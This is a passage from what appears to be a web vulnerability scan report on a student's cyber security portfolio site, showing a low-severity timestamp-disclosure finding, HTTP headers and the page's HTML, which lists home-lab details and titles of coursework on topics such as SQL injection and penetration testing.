          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
           <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          350400823
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        22. GET https://beekmans.dev/
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          67108864, which evaluates to: 1972-02-16 18:21:04

          Request
          Request line and header section (224 bytes)
          GET https://beekmans.dev/ HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1039 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O9CfHQgObVNEaGCeR54qKKwytECMmlM5H0bXWDqJpVGo4vNUT18M2ld9NoeIDxTsPe1bzHv%2F9eh3xB7p6KNQNXYdikH5v2vQoVZ4Lqr2%2BgmRM8bXQ1W95L9VnzmijHE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a326098f0c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178339 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
           <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
           <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
